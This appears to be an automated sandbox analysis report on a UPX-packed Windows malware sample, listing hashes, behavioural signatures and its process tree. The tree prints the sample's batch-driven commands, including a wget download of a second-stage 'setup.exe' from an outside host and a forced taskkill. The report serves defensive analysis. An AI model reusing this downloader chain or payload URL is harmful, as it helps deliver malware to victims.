Overview

overview

7

Static

static

3

e9c7964fa9...18.exe

windows7-x64

7

e9c7964fa9...18.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    141s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/04/2024, 10:25

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    e9c7964fa9cf03ebac5dc49a4ef04a51_JaffaCakes118.exe

  • Size

    427KB

  • MD5

    e9c7964fa9cf03ebac5dc49a4ef04a51

  • SHA1

    46ecc4897a5ea9f90a51beca89407189e92dd489

  • SHA256

    e366353e819ba1281e7c3c6ebc8f03e5e3fd443007dda00f5c881854c7e682d8

  • SHA512

    2f4e1c8f208a46d9fec3957595fcb028c95163c0731edabe5fc82ae2b73c2376dbe22f9d6bd34eff90a6d157ae39493bcd672ce52bc57e7b8ff53df93d281e74

  • SSDEEP

    12288:ig/xkJLiynXvqjggpl57rrpmNQp2YIGRY:eLrwlOuX

Score
7/10
upx

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 1 IoCs
    evasion
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e9c7964fa9cf03ebac5dc49a4ef04a51_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\e9c7964fa9cf03ebac5dc49a4ef04a51_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4280
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3D3.tmp\winupd.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1964
      • C:\Windows\SysWOW64\PING.EXE
        ping ya.ru -n 5
        3⤵
        • Runs ping.exe
        PID:5516
      • C:\Users\Admin\AppData\Local\Temp\3D3.tmp\wget.exe
        wget.exe http://tralov-trall.narod2.ru/setup.exe
        3⤵
        • Executes dropped EXE
        PID:5964
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im winupd.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3592
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3908 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:1280

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\3D3.tmp\wget.exe
            Filesize

            392KB

            MD5

            bd126a7b59d5d1f97ba89a3e71425731

            SHA1

            457b1cd985ed07baffd8c66ff40e9c1b6da93753

            SHA256

            a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

            SHA512

            3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\3D3.tmp\winupd.bat
            Filesize

            266B

            MD5

            b23fa6a298dd91c3225aef8bf12d8fb1

            SHA1

            6f1b834bb28ac1b377b2b18691c8a05e478973b0

            SHA256

            9df7e6d53af1c3ec9b436e314d91e601bd027558e059cfff09c5a7ec9efa67ec

            SHA512

            a4cecebe8d910e96661626b616e11ef3a7e9aee81439ad1a4442cc123e90937dd3f0099da54fd6864ac76090e8b3c6f565ab051c7b8f7debe13ea2737f72aa59

            Download Submit

          • memory/5964-8-0x0000000000400000-0x00000000004EF000-memory.dmp

            Filesize

            956KB

            Download

          • memory/5964-10-0x0000000000400000-0x00000000004EF000-memory.dmp

            Filesize

            956KB

            Download